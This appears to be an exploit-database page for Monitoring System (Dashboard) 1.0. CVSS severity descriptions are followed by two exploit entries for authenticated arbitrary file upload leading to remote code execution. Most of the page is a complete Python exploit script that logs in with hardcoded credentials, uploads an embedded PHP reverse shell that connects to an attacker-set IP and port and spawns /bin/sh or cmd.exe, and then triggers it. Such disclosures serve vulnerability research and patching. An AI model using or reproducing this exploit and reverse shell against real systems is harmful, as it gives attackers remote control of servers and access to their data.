The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Monitoring System (Dashboard) 1.0 Shell Upload
# Exploit Title: Monitoring System (Dashboard) | Authenticated Arbitrary File Upload to Remote Code Execution
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
Steps.
1. Login to the admin panel
2. Edit employee, view employee
3. Select edit, profile pic > Browse and select a php reverse shell
4. Call shell at "http://IPADDRESS/asistorage/modules/employee/uploads/" select your shell.php file. (will be like 16416547264_shell.php)
# Exploit Title: Monitoring System (Dashboard) | Authenticated Code Execution (2)
# Exploit Author: Richard Jones
# Date: 2021-03-11
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Usage.
# Change Target_IP, REV_IP, REV_PORT to your own
import requests
def main():
##### Change info here #####
TARGET_IP="127.0.0.1"
REV_IP="127.0.0.1"
REV_PORT=9999
############################
LOGIN="/asistorage/login.php"
MAILING_LIST="/asistorage/modules/random/index.php?view=add"
UPLOAD_URL="/asistorage/modules/random/upload.php"
VIEW_ITEM="/asistorage/modules/random/index.php"
CALL_URL="/asistorage/modules/random/uploads/"
s = requests.Session()
def phpshell():
return """
<?php
// Copyright (c) 2020 Ivan incek
// v1.1
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
header('Content-Type: text/plain; charset=UTF-8');
class Shell {
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
private $descriptorspec = array(
0 => array('pipe', 'r'), // shell can read from STDIN
1 => array('pipe', 'w'), // shell can write to STDOUT
2 => array('pipe', 'w') // shell can write to STDERR
);
private $options = array(); // proc_open() options
private $buffer = 1024; // read/write buffer size
private $clen = 0; // command length
private $error = false; // stream read/write error
public function __construct($addr, $port) {
$this->addr = $addr;
$this->port = $port;
if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
$this->os = 'LINUX';
$this->shell = '/bin/sh';
} else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
$this->os = 'WINDOWS';
$this->shell = 'cmd.exe';
$this->options['bypass_shell'] = true; // we do not want a shell within a shell
} else {
echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
exit(0);
}
}
private function daemonize() {
set_time_limit(0); // do not impose the script execution time limit
if (!function_exists('pcntl_fork')) {
echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
} else {
if (($pid = pcntl_fork()) < 0) {
echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
} else if ($pid > 0) {
echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
exit(0);
} else if (posix_setsid() < 0) { // once daemonized you will no longer see the script's dump
echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
} else {
echo "DAEMONIZE: Completed successfully!\n";
}
}
umask(0); // set the file/directory permissions - 666 for files and 777 for directories
}
private function read($stream, $name, $buffer) {
if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
}
return $data;
}
private function write($stream, $name, $data) {
if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
}
return $bytes;
}
// read/write method for non-blocking streams
private function rw($input, $output, $iname, $oname) {
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
echo $data; // script's dump
if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
}
}
// read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
// we must read the exact byte length from a stream and not a single byte more
private function brw($input, $output, $iname, $oname) {
$size = fstat($input)['size'];
if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT
$size -= $this->offset($input, $iname, $this->clen); // we do not like that
$this->clen = 0;
}
$fragments = ceil($size / $this->buffer); // number of fragments to read
$remainder = $size % $this->buffer; // size of the last fragment if it is less than the buffer size
while ($fragments && ($data = $this->read($input, $iname, $remainder && $fragments-- == 1 ? $remainder : $this->buffer)) && $this->write($output, $oname, $data)) {
echo $data; // script's dump
}
}
private function offset($stream, $name, $offset) {
$total = $offset;
while ($offset > 0 && $this->read($stream, $name, $offset >= $this->buffer ? $this->buffer : $offset)) { // discard the data from a stream
$offset -= $this->buffer;
}
return $offset > 0 ? $total - $offset : $total;
}
public function run() {
$this->daemonize();
// ----- SOCKET BEGIN -----
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if (!$socket) {
echo "SOC_ERROR: {$errno}: {$errstr}\n";
} else {
stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
// ----- SHELL BEGIN -----
$process = proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
if (!$process) {
echo "PROC_ERROR: Cannot start the shell\n";
} else {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
}
// ----- WORK BEGIN -----
fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
while (!$this->error) {
if (feof($socket)) { // check for end-of-file on SOCKET
echo "SOC_ERROR: Shell connection has been terminated\n"; break;
} else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams
} // use proc_get_status() instead
$streams = array(
'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
'write' => null,
'except' => null
);
$num_changed_streams = stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
if ($num_changed_streams === false) {
echo "STRM_ERROR: stream_select() failed\n"; break;
} else if ($num_changed_streams > 0) {
if ($this->os === 'LINUX') {
if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
} else if ($this->os === 'WINDOWS') {
// order is important
if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
}
}
}
// ------ WORK END ------
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
// ------ SHELL END ------
fclose($socket);
}
// ------ SOCKET END ------
}
}
// change the host address and/or port number as necessary
$reverse_shell = new Shell('OLDIP', OLDPORT);
$reverse_shell->Run();
?>"""
def login(url,username, password):
try:
data = {
"uname":username,
"upass":password,
"btnlogin":""
}
r = s.post(url,data=data, verify=False)
page = r.text
if "Invalid Username or Password, please try again." in page:
return False
else:
return True
except :
return False
def uploadShell(url):
s.get(f"{url}{MAILING_LIST}") # Call page
fileData = {
'uploaded_file':("rev.php",str(phpshell().replace("OLDIP", REV_IP).replace("OLDPORT", str(REV_PORT))).encode(), "application/octet-stream")}
data={
"pname":"",
"pname":"a",
'cutoff':'',
'cutoff':'a',
'projectname':'',
'type':'a',
'projectname':'',
'dsend':'2029-03-19',
'desc':'a',
'MAX_FILE_SIZE':100000,
'Uploader':'',
}
up_url=f"{url}{UPLOAD_URL}"
r = s.post(up_url, files=fileData,data=data, verify=False)
if r.status_code == 200:
print("shell uploaded")
else:
print("Shell upload failed")
exit(0)
r = s.get(f"{url}{VIEW_ITEM}")
page = r.text
DL_URL=page.split("download.php?filename=")[1].split("\">")[0]
return DL_URL
#Login
base_url=f"http://{TARGET_IP}"
login_url=f"{base_url}{LOGIN}"
b=login(login_url, "jim", "jim")
if not b:
print("Login failed, Try again...")
exit(0)
#CAll shell
base=f"{base_url}"
CALL_URL_PART=uploadShell(base)
c_url=f"{base}{CALL_URL}{CALL_URL_PART}"
s.get(c_url)
#Shell can be found at http:/TARGET//asistorage/modules/random/uploads/
if __name__ == "__main__":
main()
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